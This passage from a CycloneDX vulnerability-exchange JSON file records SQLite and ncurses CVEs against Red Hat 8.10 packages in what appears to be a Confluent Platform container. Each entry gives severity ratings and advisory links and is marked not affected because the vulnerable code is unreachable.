          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2019-9937",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In SQLite 3.27.2, interleaving reads and writes in a single transaction with an fts5 virtual table will lead to a NULL Pointer Dereference in fts5ChunkIterate in sqlite3.c. This is related to ext/fts5/fts5_hash.c and ext/fts5/fts5_index.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9937"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00026.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/107562"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9937"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00037.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXD2GYJVTDGEQPUNMMMC5TB7MQXOBBMO/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N66U5PY5UJU4XBFZJH7QNKIDNAVIB4OP/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9937"
        },
        {
          "url": "https://security.gentoo.org/glsa/201908-09"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190416-0005/"
        },
        {
          "url": "https://sqlite.org/src/info/45c73deb440496e8"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4019-1"
        },
        {
          "url": "https://usn.ubuntu.com/4019-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9937"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114383.html"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114393.html"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
        },
        {
          "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
        }
      ],
      "published": "2019-03-22T08:29:00+00:00",
      "updated": "2026-06-17T02:44:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2020-19185",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in one_one_mapping function in progs/dump_entry.c:1373 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19185"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19185"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc1.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19185"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19185"
        }
      ],
      "published": "2023-08-22T19:15:57+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19186",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in _nc_find_entry function in tinfo/comp_hash.c:66 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19186"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19186"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc2.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19186"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19186"
        }
      ],
      "published": "2023-08-22T19:15:58+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
